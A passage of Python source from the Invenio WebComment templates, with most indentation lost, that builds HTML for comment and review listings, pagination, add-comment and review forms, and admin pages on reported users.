report_link = '%(siteurl)s/record/%(recID)s/comments/report?ln=%(ln)s&comid=%%(comid)s&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/comments/display' % useful_dict % {'comid':comment[c_id]}
reply_link = '%(siteurl)s/record/%(recID)s/comments/add?ln=%(ln)s&action=REPLY&comid=%%(comid)s' % useful_dict % {'comid':comment[c_id]}
delete_links['mod'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_mod?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
delete_links['auth'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_auth?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
undelete_link = "%s/admin/webcomment/webcommentadmin.py/undel_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
unreport_link = "%s/admin/webcomment/webcommentadmin.py/unreport_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
comments_rows += self.tmpl_get_comment_without_ranking(req, ln, messaging_link, comment[c_user_id], comment[c_date_creation], comment[c_body], comment[c_status], comment[c_nb_reports], reply_link, report_link, undelete_link, delete_links, unreport_link, recID, comment[c_id], files)
else:
report_link = '%(siteurl)s/record/%(recID)s/reviews/report?ln=%(ln)s&comid=%%(comid)s&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/reviews/display' % useful_dict % {'comid': comment[c_id]}
delete_links['mod'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_mod?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
delete_links['auth'] = "%s/admin/webcomment/webcommentadmin.py/del_single_com_auth?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
undelete_link = "%s/admin/webcomment/webcommentadmin.py/undel_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
unreport_link = "%s/admin/webcomment/webcommentadmin.py/unreport_com?ln=%s&id=%s" % (CFG_SITE_URL, ln, comment[c_id])
comments_rows += self.tmpl_get_comment_with_ranking(req, ln, messaging_link, comment[c_user_id], comment[c_date_creation], comment[c_body], comment[c_status], comment[c_nb_reports], comment[c_nb_votes_total], comment[c_nb_votes_yes], comment[c_star_score], comment[c_title], report_link, delete_links, undelete_link, unreport_link, recID)
helpful_label = _("Was this review helpful?")
report_abuse_label = "(" + _("Report abuse") + ")"
yes_no_separator = '<td> / </td>'
if comment[c_nb_reports] >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN or comment[c_status] in ['dm', 'da']:
report_abuse_label = ""
helpful_label = ""
useful_yes = ""
useful_no = ""
yes_no_separator = ""
comments_rows += """
<table>
<tr>
<td>%(helpful_label)s %(tab)s</td>
<td> %(yes)s </td>
%(yes_no_separator)s
<td> %(no)s </td>
<td class="reportabuse">%(tab)s%(tab)s<a href="%(report)s">%(report_abuse_label)s</a></td>
</tr>
</table>""" \
% {'helpful_label': helpful_label,
'yes' : useful_yes % {'comid':comment[c_id]},
'yes_no_separator': yes_no_separator,
'no' : useful_no % {'comid':comment[c_id]},
'report' : report_link % {'comid':comment[c_id]},
'report_abuse_label': comment[c_nb_reports] >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN and '' or report_abuse_label,
'tab' : ' '*2}
# do NOT remove HTML comment below. It is used for parsing...
comments_rows += """
</div>
<!-- end comment row -->"""
comments_rows += '</div></div>'
## page links
page_links = ''
# Previous
if page != 1:
link_dic['arg_page'] = 'p=%s' % (page - 1)
page_links += '<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\"><<</a> ' % link_dic
else:
page_links += ' %s ' % (' '*(len(_('Previous'))+7))
# Page Numbers
for i in range(1, nb_pages+1):
link_dic['arg_page'] = 'p=%s' % i
link_dic['page'] = '%s' % i
if i != page:
page_links += '''
<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\">%(page)s</a> ''' % link_dic
else:
page_links += ''' <b>%s</b> ''' % i
# Next
if page != nb_pages:
link_dic['arg_page'] = 'p=%s' % (page + 1)
page_links += '''
<a href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s\">>></a> ''' % link_dic
else:
page_links += '%s' % (' '*(len(_('Next'))+7))
## stuff for ranking if enabled
if reviews:
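            # avg_score is a float such as 3.5; the star image name encodes
            # its integer and decimal parts, e.g. 3.5 -> 'stars-3-5.png'.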
if avg_score > 0:
avg_score_img = 'stars-' + str(avg_score).split('.')[0] + '-' + str(avg_score).split('.')[1] + '.png'
else:
avg_score_img = "stars-0-0.png"
ranking_average = '<br /><b>'
ranking_average += _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '</b><img src="' + CFG_SITE_URL + '/img/' + avg_score_img + '" alt="' + str(avg_score) + '" />',
'x_nb_reviews': str(total_nb_reviews)}
ranking_average += '<br />'
else:
ranking_average = ""
write_button_link = '''%s/record/%s/%s/add''' % (CFG_SITE_URL, recID, discussion)
write_button_form = '<input type="hidden" name="ln" value="%s"/>'
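        # Note: "cond and A or B" is the pre-Python-2.5 conditional idiom; it
        # is only safe when A is truthy, which holds for the non-empty label
        # strings used here.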
write_button_form = self.createhiddenform(action=write_button_link,
method="get",
text=write_button_form,
button = reviews and _('Write a review') or _('Write a comment'))
if reviews:
total_label = _("There is a total of %s reviews")
else:
total_label = _("There is a total of %s comments")
total_label %= total_nb_comments
review_or_comment_first = ''
if reviews == 0 and total_nb_comments == 0 and can_send_comments:
review_or_comment_first = _("Start a discussion about any aspect of this document.") + '<br />'
elif reviews == 1 and total_nb_reviews == 0 and can_send_comments:
review_or_comment_first = _("Be the first to review this document.") + '<br />'
# do NOT remove the HTML comments below. Used for parsing
body = '''
%(comments_and_review_tabs)s
<!-- start comments table -->
<div style="border: %(border)spx solid black; width: 95%%; margin:10px;font-size:small">
%(comments_rows)s
</div>
<!-- end comments table -->
%(review_or_comment_first)s
<br />''' % \
{ 'record_label': _("Record"),
'back_label': _("Back to search results"),
'total_label': total_label,
'write_button_form' : write_button_form,
'write_button_form_again' : total_nb_comments>3 and write_button_form or "",
'comments_rows' : comments_rows,
'total_nb_comments' : total_nb_comments,
'comments_or_reviews' : reviews and _('review') or _('comment'),
'comments_or_reviews_title' : reviews and _('Review') or _('Comment'),
'siteurl' : CFG_SITE_URL,
'module' : "comments",
'recid' : recID,
'ln' : ln,
'border' : border,
'ranking_avg' : ranking_average,
'comments_and_review_tabs' : CFG_WEBCOMMENT_ALLOW_REVIEWS and \
CFG_WEBCOMMENT_ALLOW_COMMENTS and \
'%s | %s <br />' % \
(comments_link, reviews_link) or '',
'review_or_comment_first' : review_or_comment_first
}
# form is not currently used. reserved for an eventual purpose
#form = """
# Display <select name="nb" size="1"> per page
# <option value="all">All</option>
# <option value="10">10</option>
        #              <option value="25">25</option>
# <option value="50">50</option>
# <option value="100" selected="selected">100</option>
# </select>
# comments per page that are <select name="ds" size="1">
# <option value="all" selected="selected">Any age</option>
# <option value="1d">1 day old</option>
# <option value="3d">3 days old</option>
# <option value="1w">1 week old</option>
# <option value="2w">2 weeks old</option>
# <option value="1m">1 month old</option>
# <option value="3m">3 months old</option>
# <option value="6m">6 months old</option>
# <option value="1y">1 year old</option>
# </select>
# and sorted by <select name="do" size="1">
# <option value="od" selected="selected">Oldest first</option>
# <option value="nd">Newest first</option>
# %s
# </select>
# """ % \
# (reviews==1 and '''
# <option value=\"hh\">most helpful</option>
# <option value=\"lh\">least helpful</option>
# <option value=\"hs\">highest star ranking</option>
# <option value=\"ls\">lowest star ranking</option>
# </select>''' or '''
# </select>''')
#
#form_link = "%(siteurl)s/%(module)s/%(function)s" % link_dic
#form = self.createhiddenform(action=form_link, method="get", text=form, button='Go', recid=recID, p=1)
pages = """
<div>
%(v_label)s %(comments_or_reviews)s %(results_nb_lower)s-%(results_nb_higher)s <br />
%(page_links)s
</div>
""" % \
{'v_label': _("Viewing"),
'page_links': _("Page:") + page_links ,
'comments_or_reviews': reviews and _('review') or _('comment'),
'results_nb_lower': len(comments)>0 and ((page-1) * nb_per_page)+1 or 0,
'results_nb_higher': page == nb_pages and (((page-1) * nb_per_page) + len(comments)) or (page * nb_per_page)}
if nb_pages > 1:
#body = warnings + body + form + pages
body = warnings + body + pages
else:
body = warnings + body
if reviews == 0:
if not user_is_subscribed_to_discussion:
body += '<small>'
body += '<div class="comment-subscribe">' + '<img src="%s/img/mail-icon-12x8.gif" border="0" alt="" />' % CFG_SITE_URL + \
' ' + '<b>' + create_html_link(urlbase=CFG_SITE_URL + '/record/' + \
str(recID) + '/comments/subscribe',
urlargd={},
link_label=_('Subscribe')) + \
'</b>' + ' to this discussion. You will then receive all new comments by email.' + '</div>'
body += '</small><br />'
elif user_can_unsubscribe_from_discussion:
body += '<small>'
body += '<div class="comment-subscribe">' + '<img src="%s/img/mail-icon-12x8.gif" border="0" alt="" />' % CFG_SITE_URL + \
' ' + '<b>' + create_html_link(urlbase=CFG_SITE_URL + '/record/' + \
str(recID) + '/comments/unsubscribe',
urlargd={},
link_label=_('Unsubscribe')) + \
'</b>' + ' from this discussion. You will no longer receive emails about new comments.' + '</div>'
body += '</small><br />'
if can_send_comments:
body += add_comment_or_review
else:
body += '<br/><em>' + _("You are not authorized to comment or review.") + '</em>'
return '<div style="margin-left:10px;margin-right:10px;">' + body + '</div>'
def create_messaging_link(self, to, display_name, ln=CFG_SITE_LANG):
"""prints a link to the messaging system"""
link = "%s/yourmessages/write?msg_to=%s&ln=%s" % (CFG_SITE_URL, to, ln)
if to:
return '<a href="%s" class="maillink">%s</a>' % (link, display_name)
else:
return display_name
def createhiddenform(self, action="", method="get", text="", button="confirm", cnfrm='', **hidden):
"""
create select with hidden values and submit button
@param action: name of the action to perform on submit
@param method: 'get' or 'post'
@param text: additional text, can also be used to add non hidden input
@param button: value/caption on the submit button
@param cnfrm: if given, must check checkbox to confirm
@param **hidden: dictionary with name=value pairs for hidden input
@return: html form
"""
output = """
<form action="%s" method="%s">""" % (action, method.lower().strip() in ['get', 'post'] and method or 'get')
output += """
<table style="width:90%">
<tr>
<td style="vertical-align: top">
"""
output += text + '\n'
if cnfrm:
output += """
<input type="checkbox" name="confirm" value="1" />"""
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += """
</td>
</tr>
<tr>
<td>"""
output += """
<input class="adminbutton" type="submit" value="%s" />""" % (button, )
output += """
</td>
</tr>
</table>
</form>"""
return output
def create_write_comment_hiddenform(self, action="", method="get", text="", button="confirm", cnfrm='', enctype='', **hidden):
"""
create select with hidden values and submit button
@param action: name of the action to perform on submit
@param method: 'get' or 'post'
@param text: additional text, can also be used to add non hidden input
@param button: value/caption on the submit button
@param cnfrm: if given, must check checkbox to confirm
@param **hidden: dictionary with name=value pairs for hidden input
@return: html form
"""
enctype_attr = ''
if enctype:
            enctype_attr = 'enctype="' + enctype + '"'
output = """
<form action="%s" method="%s" %s>""" % (action, method.lower().strip() in ['get', 'post'] and method or 'get', enctype_attr)
if cnfrm:
output += """
<input type="checkbox" name="confirm" value="1" />"""
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += text + '\n'
output += """
</form>"""
return output
def tmpl_warnings(self, warnings, ln=CFG_SITE_LANG):
"""
Prepare the warnings list
@param warnings: list of warning tuples (warning_msg, arg1, arg2, etc)
@return: html string of warnings
"""
red_text_warnings = ['WRN_WEBCOMMENT_FEEDBACK_NOT_RECORDED',
'WRN_WEBCOMMENT_ALREADY_VOTED']
green_text_warnings = ['WRN_WEBCOMMENT_FEEDBACK_RECORDED',
'WRN_WEBCOMMENT_SUBSCRIBED',
'WRN_WEBCOMMENT_UNSUBSCRIBED']
from invenio.errorlib import get_msgs_for_code_list
span_class = 'important'
out = ""
if type(warnings) is not list:
warnings = [warnings]
if len(warnings) > 0:
warnings_parsed = get_msgs_for_code_list(warnings, 'warning', ln)
for (warning_code, warning_text) in warnings_parsed:
if not warning_code.startswith('WRN'):
#display only warnings that begin with WRN to user
continue
if warning_code in red_text_warnings:
span_class = 'important'
elif warning_code in green_text_warnings:
span_class = 'exampleleader'
else:
span_class = 'important'
out += '''
<span class="%(span_class)s">%(warning)s</span><br />''' % \
{ 'span_class' : span_class,
'warning' : warning_text }
return out
else:
return ""
def tmpl_add_comment_form(self, recID, uid, nickname, ln, msg,
warnings, textual_msg=None, can_attach_files=False,
user_is_subscribed_to_discussion=False, reply_to=None):
"""
Add form for comments
@param recID: record id
@param uid: user id
@param ln: language
@param msg: comment body contents for when refreshing due to
warning, or when replying to a comment
@param textual_msg: same as 'msg', but contains the textual
version in case user cannot display FCKeditor
@param warnings: list of warning tuples (warning_msg, color)
@param can_attach_files: if user can upload attach file to record or not
@param user_is_subscribed_to_discussion: True if user already receives new comments by email
@param reply_to: the ID of the comment we are replying to. None if not replying
@return html add comment form
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'add',
'arguments' : 'ln=%s&action=%s' % (ln, 'SUBMIT'),
'recID' : recID}
if textual_msg is None:
textual_msg = msg
# FIXME a cleaner handling of nicknames is needed.
if not nickname:
(uid, nickname, display) = get_user_info(uid)
if nickname:
note = _("Note: Your nickname, %s, will be displayed as author of this comment.") % ('<i>' + nickname + '</i>')
else:
(uid, nickname, display) = get_user_info(uid)
link = '<a href="%s/youraccount/edit">' % CFG_SITE_SECURE_URL
note = _("Note: you have not %(x_url_open)sdefined your nickname%(x_url_close)s. %(x_nickname)s will be displayed as the author of this comment.") % \
{'x_url_open': link,
'x_url_close': '</a>',
'x_nickname': ' <br /><i>' + display + '</i>'}
if not CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR:
note += '<br />' + ' '*10 + cgi.escape('You can use some HTML tags: <a href>, <strong>, <blockquote>, <br />, <p>, <em>, <ul>, <li>, <b>, <i>')
#from invenio.search_engine import print_record
#record_details = print_record(recID=recID, format='hb', ln=ln)
warnings = self.tmpl_warnings(warnings, ln)
# Prepare file upload settings. We must enable file upload in
        # the fckeditor + a simple file upload interface (independent from the editor)
file_upload_url = None
simple_attach_file_interface = ''
if isGuestUser(uid):
simple_attach_file_interface = "<small><em>%s</em></small><br/>" % _("Once logged in, authorized users can also attach files.")
if can_attach_files:
# Note that files can be uploaded only when user is logged in
#file_upload_url = '%s/record/%i/comments/attachments/put' % \
# (CFG_SITE_URL, recID)
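            # The "multi max-N" class below is picked up by a JavaScript
            # multi-file widget (loaded elsewhere) that clones the input up to
            # N times; the <noscript> fallback offers a single plain input.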
simple_attach_file_interface = '''
<div id="uploadcommentattachmentsinterface">
<small>%(attach_msg)s: <em>(%(nb_files_limit_msg)s. %(file_size_limit_msg)s)</em></small><br />
<input class="multi max-%(CFG_WEBCOMMENT_MAX_ATTACHED_FILES)s" type="file" name="commentattachment[]"/><br />
<noscript>
<input type="file" name="commentattachment[]" /><br />
</noscript>
</div>
''' % \
{'CFG_WEBCOMMENT_MAX_ATTACHED_FILES': CFG_WEBCOMMENT_MAX_ATTACHED_FILES,
'attach_msg': CFG_WEBCOMMENT_MAX_ATTACHED_FILES == 1 and _("Optionally, attach a file to this comment") or \
_("Optionally, attach files to this comment"),
'nb_files_limit_msg': _("Max one file") and CFG_WEBCOMMENT_MAX_ATTACHED_FILES == 1 or \
_("Max %i files") % CFG_WEBCOMMENT_MAX_ATTACHED_FILES,
'file_size_limit_msg': CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE > 0 and _("Max %(x_nb_bytes)s per file") % {'x_nb_bytes': (CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE < 1024*1024 and (str(CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE/1024) + 'KB') or (str(CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE/(1024*1024)) + 'MB'))} or ''}
editor = get_html_text_editor(name='msg',
content=msg,
textual_content=textual_msg,
width='100%',
height='400px',
enabled=CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR,
file_upload_url=file_upload_url,
toolbar_set = "WebComment")
subscribe_to_discussion = ''
if not user_is_subscribed_to_discussion:
# Offer to subscribe to discussion
subscribe_to_discussion = '<small><input type="checkbox" name="subscribe" id="subscribe"/><label for="subscribe">%s</label></small>' % _("Send me an email when a new comment is posted")
form = """<div id="comment-write"><h2>%(add_comment)s</h2>
%(editor)s
<br />
%(simple_attach_file_interface)s
<span class="reportabuse">%(note)s</span>
<div class="submit-area">
%(subscribe_to_discussion)s<br />
<input class="adminbutton" type="submit" value="Add comment" />
%(reply_to)s
</div>
""" % {'note': note,
'record_label': _("Article") + ":",
'comment_label': _("Comment") + ":",
'add_comment': _('Add comment'),
'editor': editor,
'subscribe_to_discussion': subscribe_to_discussion,
'reply_to': reply_to and '<input type="hidden" name="comid" value="%s"/>' % reply_to or '',
'simple_attach_file_interface': simple_attach_file_interface}
form_link = "%(siteurl)s/record/%(recID)s/comments/%(function)s?%(arguments)s" % link_dic
form = self.create_write_comment_hiddenform(action=form_link, method="post", text=form, button='Add comment',
enctype='multipart/form-data')
form += '</div>'
return warnings + form
def tmpl_add_comment_form_with_ranking(self, recID, uid, nickname, ln, msg, score, note,
warnings, textual_msg=None, show_title_p=False,
can_attach_files=False):
"""
Add form for reviews
@param recID: record id
@param uid: user id
@param ln: language
@param msg: comment body contents for when refreshing due to warning
@param textual_msg: the textual version of 'msg' when user cannot display FCKeditor
@param score: review score
@param note: review title
@param warnings: list of warning tuples (warning_msg, color)
@param show_title_p: if True, prefix the form with "Add Review" as title
@param can_attach_files: if user can upload attach file to record or not
@return: html add review form
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'add',
'arguments' : 'ln=%s&action=%s' % (ln, 'SUBMIT'),
'recID' : recID}
warnings = self.tmpl_warnings(warnings, ln)
if textual_msg is None:
textual_msg = msg
#from search_engine import print_record
#record_details = print_record(recID=recID, format='hb', ln=ln)
if nickname:
note_label = _("Note: Your nickname, %s, will be displayed as the author of this review.")
note_label %= ('<i>' + nickname + '</i>')
else:
(uid, nickname, display) = get_user_info(uid)
link = '<a href="%s/youraccount/edit">' % CFG_SITE_SECURE_URL
note_label = _("Note: you have not %(x_url_open)sdefined your nickname%(x_url_close)s. %(x_nickname)s will be displayed as the author of this comment.") % \
{'x_url_open': link,
'x_url_close': '</a>',
'x_nickname': ' <br /><i>' + display + '</i>'}
selected0 = ''
selected1 = ''
selected2 = ''
selected3 = ''
selected4 = ''
selected5 = ''
if score == 0:
selected0 = ' selected="selected"'
elif score == 1:
selected1 = ' selected="selected"'
elif score == 2:
selected2 = ' selected="selected"'
elif score == 3:
selected3 = ' selected="selected"'
elif score == 4:
selected4 = ' selected="selected"'
elif score == 5:
selected5 = ' selected="selected"'
## file_upload_url = None
## if can_attach_files:
## file_upload_url = '%s/record/%i/comments/attachments/put' % \
## (CFG_SITE_URL, recID)
editor = get_html_text_editor(name='msg',
content=msg,
textual_content=msg,
width='90%',
height='400px',
enabled=CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR,
# file_upload_url=file_upload_url,
toolbar_set = "WebComment")
form = """%(add_review)s
<table style="width: 100%%">
<tr>
<td style="padding-bottom: 10px;">%(rate_label)s:
<select name=\"score\" size=\"1\">
<option value=\"0\"%(selected0)s>-%(select_label)s-</option>
<option value=\"5\"%(selected5)s>***** (best)</option>
<option value=\"4\"%(selected4)s>****</option>
<option value=\"3\"%(selected3)s>***</option>
<option value=\"2\"%(selected2)s>**</option>
<option value=\"1\"%(selected1)s>* (worst)</option>
</select>
</td>
</tr>
<tr>
<td>%(title_label)s:</td>
</tr>
<tr>
<td style="padding-bottom: 10px;">
<input type="text" name="note" maxlength="250" style="width:90%%" value="%(note)s" />
</td>
</tr>
<tr>
<td>%(write_label)s:</td>
</tr>
<tr>
<td>
%(editor)s
</td>
</tr>
<tr>
<td class="reportabuse">%(note_label)s</td></tr>
</table>
""" % {'article_label': _('Article'),
'rate_label': _("Rate this article"),
'select_label': _("Select a score"),
'title_label': _("Give a title to your review"),
'write_label': _("Write your review"),
'note_label': note_label,
'note' : note!='' and note or "",
'msg' : msg!='' and msg or "",
#'record' : record_details
'add_review': show_title_p and ('<h2>'+_('Add review')+'</h2>') or '',
'selected0': selected0,
'selected1': selected1,
'selected2': selected2,
'selected3': selected3,
'selected4': selected4,
'selected5': selected5,
'editor': editor,
}
form_link = "%(siteurl)s/record/%(recID)s/reviews/%(function)s?%(arguments)s" % link_dic
form = self.createhiddenform(action=form_link, method="post", text=form, button=_('Add Review'))
return warnings + form
def tmpl_add_comment_successful(self, recID, ln, reviews, warnings, success):
"""
@param recID: record id
@param ln: language
@return: html page of successfully added comment/review
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'display',
'arguments' : 'ln=%s&do=od' % ln,
'recID' : recID,
'discussion': reviews == 1 and 'reviews' or 'comments'}
link = "%(siteurl)s/record/%(recID)s/%(discussion)s/%(function)s?%(arguments)s" % link_dic
if warnings:
out = self.tmpl_warnings(warnings, ln) + '<br /><br />'
else:
if reviews:
out = _("Your review was successfully added.") + '<br /><br />'
else:
out = _("Your comment was successfully added.") + '<br /><br />'
link += "#%s" % success
out += '<a href="%s">' % link
out += _('Back to record') + '</a>'
return out
def tmpl_create_multiple_actions_form(self,
form_name="",
form_action="",
method="get",
action_display={},
action_field_name="",
button_label="",
button_name="",
content="",
**hidden):
""" Creates an HTML form with a multiple choice of actions and a button to select it.
        @param form_action: link to the receiver of the form
        @param form_name: name of the HTML form
        @param method: either 'GET' or 'POST'
        @param action_display: dictionary of actions.
                               Keys are the HTML values (action names),
                               values are the labels shown in the popup menu
@param action_field_name: html name of action field
@param button_label: what's written on the button
@param button_name: html name of the button
        @param content: what's inside the form
@param **hidden: dictionary of name/value pairs of hidden fields.
"""
output = """
<form action="%s" method="%s">""" % (form_action, method)
output += """
<table>
<tr>
<td style="vertical-align: top" colspan="2">
"""
output += content + '\n'
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += """
</td>
</tr>
<tr>
<td style="text-align:right;">"""
if type(action_display) is dict and len(action_display.keys()):
output += """
<select name="%s">""" % action_field_name
for (key, value) in action_display.items():
output += """
<option value="%s">%s</option>""" % (key, value)
output += """
</select>"""
output += """
</td>
<td style="text-align:left;">
<input class="adminbutton" type="submit" value="%s" name="%s"/>""" % (button_label, button_name)
output += """
</td>
</tr>
</table>
</form>"""
return output
def tmpl_admin_index(self, ln):
"""
Index page
"""
# load the right message language
_ = gettext_set_language(ln)
out = '<ol>'
if CFG_WEBCOMMENT_ALLOW_COMMENTS or CFG_WEBCOMMENT_ALLOW_REVIEWS:
if CFG_WEBCOMMENT_ALLOW_COMMENTS:
out += '<h3>Comments status</h3>'
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/hot?ln=%(ln)s&comments=1">%(hot_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'hot_cmt_label': _("View most commented records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/latest?ln=%(ln)s&comments=1">%(latest_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'latest_cmt_label': _("View latest commented records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/comments?ln=%(ln)s&reviews=0">%(reported_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'reported_cmt_label': _("View all comments reported as abuse")}
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
out += '<h3>Reviews status</h3>'
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/hot?ln=%(ln)s&comments=0">%(hot_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'hot_rev_label': _("View most reviewed records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/latest?ln=%(ln)s&comments=0">%(latest_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'latest_rev_label': _("View latest reviewed records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/comments?ln=%(ln)s&reviews=1">%(reported_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'reported_rev_label': _("View all reviews reported as abuse")}
#<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/delete?ln=%(ln)s&comid=-1">%(delete_label)s</a></li>
out +="""
<h3>General</h3>
<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/users?ln=%(ln)s">%(view_users)s</a></li>
<li><a href="%(siteurl)s/help/admin/webcomment-admin-guide">%(guide)s</a></li>
""" % {'siteurl' : CFG_SITE_URL,
#'delete_label': _("Delete/Undelete comment(s) or suppress abuse report(s)"),
'view_users': _("View all users who have been reported"),
'ln' : ln,
'guide' : _("Guide")}
else:
out += _("Comments and reviews are disabled") + '<br />'
out += '</ol>'
from invenio.bibrankadminlib import addadminbox
return addadminbox('<b>%s</b>'% _("Menu"), [out])
def tmpl_admin_delete_form(self, ln, warnings):
"""
Display admin interface to fetch list of records to delete
@param warnings: list of warning_tuples where warning_tuple is (warning_message, text_color)
see tmpl_warnings, color is optional
"""
# load the right message language
_ = gettext_set_language(ln)
warnings = self.tmpl_warnings(warnings, ln)
out = '''
<br />
%s<br />
<br />'''% _("Please enter the ID of the comment/review so that you can view it before deciding whether to delete it or not")
        form = '''
            <table>
                <tr>
                    <td>%s</td>
                    <td><input type="text" name="comid" size="10" maxlength="10" value="" /></td>
                </tr>
                <tr>
                    <td><br /></td>
                </tr>
            </table>
            <br />
            %s <br/>
            <br />
            <table>
                <tr>
                    <td>%s</td>
                    <td><input type="text" name="recid" size="10" maxlength="10" value="" /></td>
                </tr>
                <tr>
                    <td><br /></td>
                </tr>
            </table>
            <br />
        ''' % (_("Comment ID:"),
               _("Or enter a record ID to list all the associated comments/reviews:"),
               _("Record ID:"))
form_link = "%s/admin/webcomment/webcommentadmin.py/delete?ln=%s" % (CFG_SITE_URL, ln)
form = self.createhiddenform(action=form_link, method="get", text=form, button=_('View Comment'))
return warnings + out + form
def tmpl_admin_users(self, ln, users_data):
"""
@param users_data: tuple of ct, i.e. (ct, ct, ...)
where ct is a tuple (total_number_reported, total_comments_reported, total_reviews_reported, total_nb_votes_yes_of_reported,
total_nb_votes_total_of_reported, user_id, user_email, user_nickname)
sorted by order of ct having highest total_number_reported
"""
_ = gettext_set_language(ln)
u_reports = 0
u_comment_reports = 1
u_reviews_reports = 2
u_nb_votes_yes = 3
u_nb_votes_total = 4
u_uid = 5
u_email = 6
u_nickname = 7
if not users_data:
return self.tmpl_warnings([(_("There have been no reports so far."), 'green')])
user_rows = ""
for utuple in users_data:
com_label = _("View all %s reported comments") % utuple[u_comment_reports]
com_link = '''<a href="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&uid=%s&reviews=0">%s</a><br />''' % \
(CFG_SITE_URL, ln, utuple[u_uid], com_label)
rev_label = _("View all %s reported reviews") % utuple[u_reviews_reports]
rev_link = '''<a href="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&uid=%s&reviews=1">%s</a>''' % \
(CFG_SITE_URL, ln, utuple[u_uid], rev_label)
if not utuple[u_nickname]:
user_info = get_user_info(utuple[u_uid])
nickname = user_info[2]
else:
nickname = utuple[u_nickname]
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
review_row = """
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>"""
review_row %= (utuple[u_nb_votes_yes],
utuple[u_nb_votes_total] - utuple[u_nb_votes_yes],
utuple[u_nb_votes_total])
else:
review_row = ''
user_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(nickname)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(email)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(uid)s</td>%(review_row)s
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray; font-weight: bold;">%(reports)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(com_link)s%(rev_link)s</td>
</tr>""" % { 'nickname' : nickname,
'email' : utuple[u_email],
'uid' : utuple[u_uid],
'reports' : utuple[u_reports],
'review_row': review_row,
'siteurl' : CFG_SITE_URL,
'ln' : ln,
'com_link' : CFG_WEBCOMMENT_ALLOW_COMMENTS and com_link or "",
'rev_link' : CFG_WEBCOMMENT_ALLOW_REVIEWS and rev_link or ""
}
out = "<br />"
out += _("Here is a list, sorted by total number of reports, of all users who have had a comment reported at least once.")
out += """
<br />
<br />
<table class="admin_wvar" style="width: 100%%;">
<thead>
<tr class="adminheaderleft">
<th>"""
out += _("Nickname") + '</th>\n'
